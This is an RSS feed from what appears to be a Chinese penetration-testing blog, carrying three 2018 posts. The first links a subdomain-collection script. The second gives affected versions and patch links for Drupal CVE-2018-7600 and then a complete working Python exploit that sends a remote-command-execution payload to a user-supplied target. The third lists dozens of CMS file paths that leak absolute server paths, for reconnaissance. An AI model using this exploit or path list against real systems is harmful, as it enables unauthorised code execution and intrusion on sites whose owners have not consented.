<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>收集 &#8211; ChaBug安全</title>
	<atom:link href="/tags/%E6%94%B6%E9%9B%86/feed" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description>一个分享知识、结识伙伴、资源共享的博客</description>
	<lastBuildDate>Thu, 17 May 2018 12:53:55 +0000</lastBuildDate>
	<language>zh-CN</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=5.5.5</generator>
	<item>
		<title>子域名收集脚本</title>
		<link>/tools/402.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Sat, 21 Apr 2018 14:51:32 +0000</pubDate>
				<category><![CDATA[工具分享]]></category>
		<category><![CDATA[子域名]]></category>
		<category><![CDATA[收集]]></category>
		<category><![CDATA[脚本]]></category>
		<guid isPermaLink="false">/?p=337</guid>

					<description><![CDATA[kali下运行。需要配置三款工具所需的模块脚本。 Shell脚本集成了 SubDomain Sublist Teemo 链接：https://pan.baidu.com/s/1Kb...]]></description>
										<content:encoded><![CDATA[<p><img src="http://www.farmsec.cn/wp-content/uploads/2018/04/123.png" alt="演示" title="演示"></p>
<p>kali下运行。需要配置三款工具所需的模块<span class="wpcom_tag_link"><a href="/tags/%e8%84%9a%e6%9c%ac" title="脚本" target="_blank">脚本</a></span>。</p>
<p>Shell脚本集成了</p>
<pre><code>SubDomain
Sublist
Teemo</code></pre>
<p>链接：<a href="https://pan.baidu.com/s/1KbYkQbC4uXK_HDDSl8IWEg">https://pan.baidu.com/s/1KbYkQbC4uXK_HDDSl8IWEg</a> 密码：ydsk</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>CVE-2018-7600 Drupal 远程命令执行漏洞EXP</title>
		<link>/web/399.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Sat, 14 Apr 2018 15:19:00 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[Drupal]]></category>
		<category><![CDATA[exp]]></category>
		<category><![CDATA[收集]]></category>
		<category><![CDATA[漏洞]]></category>
		<category><![CDATA[远程命令执行]]></category>
		<guid isPermaLink="false">/?p=328</guid>

					<description><![CDATA[CVE-2018-7600 Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8...]]></description>
										<content:encoded><![CDATA[<p>CVE-2018-7600</p>
<blockquote><p><span class="wpcom_tag_link"><a href="/tags/drupal" title="Drupal" target="_blank">Drupal</a></span> before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code .</p></blockquote>
<h3>影响版本</h3>
<ol>
<li>Drupal 6</li>
<li>Drupal 7</li>
<li>Drupal 8</li>
</ol>
<h3>修复建议</h3>
<p>Drupal 6.x的修复参考以下网站：</p>
<p><a href="https://www.drupal.org/project/d6lts">https://www.drupal.org/project/d6lts</a></p>
<p>Drupal 7.x请升级到Drupal 7.5.8版本，</p>
<p>同时官方给出7.X补丁，若用户无法立即升级版本，请更新补丁，补丁地址为：</p>
<p><a href="https://cgit.drupalcode.org/drupal/rawdiff/?h=7.x&#038;id=2266d2a83db50e2f97682d9a0fb8a18e2722cba5">https://cgit.drupalcode.org/drupal/rawdiff/?h=7.x&#038;id=2266d2a83db50e2f97682d9a0fb8a18e2722cba5</a></p>
<p>Drupal 8.5.x请升级到Drupal 8.5.1版本</p>
<p>同时官方给出8.5.X补丁，若用户无法立即升级版本，请更新补丁，补丁地址为：</p>
<p><a href="https://cgit.drupalcode.org/drupal/rawdiff/?h=8.5.x&#038;id=5ac8738fa69df34a0635f0907d661b509ff9a28f">https://cgit.drupalcode.org/drupal/rawdiff/?h=8.5.x&#038;id=5ac8738fa69df34a0635f0907d661b509ff9a28f</a></p>
<p>Drupal 8.3.x和8.4.x版本官方已不进行维护，但此<span class="wpcom_tag_link"><a href="/tags/%e6%bc%8f%e6%b4%9e" title="漏洞" target="_blank">漏洞</a></span>非常严重，官方此次也给出了对应补丁，补丁同8.5.x版本：补丁地址为：</p>
<p><a href="https://cgit.drupalcode.org/drupal/rawdiff/?h=8.5.x&#038;id=5ac8738fa69df34a0635f0907d661b509ff9a28f">https://cgit.drupalcode.org/drupal/rawdiff/?h=8.5.x&#038;id=5ac8738fa69df34a0635f0907d661b509ff9a28f</a></p>
<p>由于Drupal 8.3.x和8.4.x版本官方已不进行维护，建议用户最好升级到官方维护的Drupal 8.3.9以及Drupal 8.4.6版本</p>
<h3>友情提示</h3>
<p>Drupal 8.0.x、Drupal 8.1.x、Drupal 8.2.x官方已不再维护，请各位用户升级到官方维护的版本</p>
<h3>EXP</h3>
<pre><code>#!/usr/bin/env
import sys
import requests
print ('################################################################')
print ('# Proof-Of-Concept for CVE-2018-7600')
print ('# by Vitalii Rudnykh')
print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')
print ('# https://github.com/a2u/CVE-2018-7600')
print ('################################################################')
print ('Provided only for educational or information purposes\n')
target = input('Enter target url (example: https://domain.ltd/): ')
url = target + 'user/register?element_parents=account/mail/%23value&amp;ajax_form=1&amp;_wrapper_format=drupal_ajax'
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo &quot;;-)&quot; | tee hello.txt'}
r = requests.post(url, data=payload)
if r.status_code != 200:
  sys.exit(&quot;Not exploitable&quot;)
print ('\nCheck: '+target+'hello.txt')</code></pre>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>cms爆绝对路径收集</title>
		<link>/web/389.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Wed, 28 Mar 2018 16:28:30 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[dedecms]]></category>
		<category><![CDATA[ecshop]]></category>
		<category><![CDATA[搜集]]></category>
		<category><![CDATA[收集]]></category>
		<category><![CDATA[爆错]]></category>
		<category><![CDATA[绝对路径]]></category>
		<guid isPermaLink="false">/?p=318</guid>

					<description><![CDATA[DeDeCms /member/templets/menulit.php /plus/paycenter/alipay/return_url.php /plus/paycenter...]]></description>
										<content:encoded><![CDATA[<h1>DeDeCms</h1>
<pre><code>/member/templets/menulit.php
/plus/paycenter/alipay/return_url.php
/plus/paycenter/cbpayment/autoreceive.php
/paycenter/nps/config_pay_nps.php
/plus/task/dede-maketimehtml.php
/plus/task/dede-optimize-table.php
/plus/task/dede-upcache.php</code></pre>
<h1>WordPress</h1>
<pre><code>/wp-admin/includes/file.php
/wp-content/themes/baiaogu-seo/footer.php</code></pre>
<h1>Ecshop商城系统暴路径漏洞文件</h1>
<pre><code>/api/cron.php
/wap/goods.php
/temp/compiled/ur_here.lbi.php
/temp/compiled/pages.lbi.php
/temp/compiled/user_transaction.dwt.php
/temp/compiled/history.lbi.php
/temp/compiled/page_footer.lbi.php
/temp/compiled/goods.dwt.php
/temp/compiled/user_clips.dwt.php
/temp/compiled/goods_article.lbi.php
/temp/compiled/comments_list.lbi.php
/temp/compiled/recommend_promotion.lbi.php
/temp/compiled/search.dwt.php
/temp/compiled/category_tree.lbi.php
/temp/compiled/user_passport.dwt.php
/temp/compiled/promotion_info.lbi.php
/temp/compiled/user_menu.lbi.php
/temp/compiled/message.dwt.php
/temp/compiled/admin/pagefooter.htm.php
/temp/compiled/admin/page.htm.php
/temp/compiled/admin/start.htm.php
/temp/compiled/admin/goods_search.htm.php
/temp/compiled/admin/index.htm.php
/temp/compiled/admin/order_list.htm.php
/temp/compiled/admin/menu.htm.php
/temp/compiled/admin/login.htm.php
/temp/compiled/admin/message.htm.php
/temp/compiled/admin/goods_list.htm.php
/temp/compiled/admin/pageheader.htm.php
/temp/compiled/admin/top.htm.php
/temp/compiled/top10.lbi.php
/temp/compiled/member_info.lbi.php
/temp/compiled/bought_goods.lbi.php
/temp/compiled/goods_related.lbi.php
/temp/compiled/page_header.lbi.php
/temp/compiled/goods_script.html.php
/temp/compiled/index.dwt.php
/temp/compiled/goods_fittings.lbi.php
/temp/compiled/myship.dwt.php
/temp/compiled/brands.lbi.php
/temp/compiled/help.lbi.php
/temp/compiled/goods_gallery.lbi.php
/temp/compiled/comments.lbi.php
/temp/compiled/myship.lbi.php
/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
/includes/modules/cron/auto_manage.php
/includes/modules/cron/ipdel.php</code></pre>
<h1>Ucenter爆路径</h1>
<pre><code>/ucenter/control/admin/db.php</code></pre>
<h1>DZbbs</h1>
<pre><code>/manyou/admincp.php?my_suffix=%0A%0DTOBY57</code></pre>
<h1>Z-blog</h1>
<pre><code>/admin/FCKeditor/editor/dialog/fck%5Fspellerpages/spellerpages/server%2Dscripts/spellchecker.php</code></pre>
<h1>Php168爆路径</h1>
<pre><code>/admin/inc/hack/count.php?job=list
/admin/inc/hack/search.php?job=getcode
/admin/inc/ajax/bencandy.php?job=do
/cache/MysqlTime.txt
/PHPcms2008-sp4</code></pre>
<p>注册用户登陆后访问</p>
<pre><code>/phpcms/corpandresize/process.php?pic=../images/logo.gif</code></pre>
<h1>CMSeasy爆网站路径漏洞</h1>
<p>漏洞出现在menu_top.php这个文件中</p>
<pre><code>/lib/mods/celive/menu_top.php
/lib/default/ballot_act.php
/lib/default/special_act.php</code></pre>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
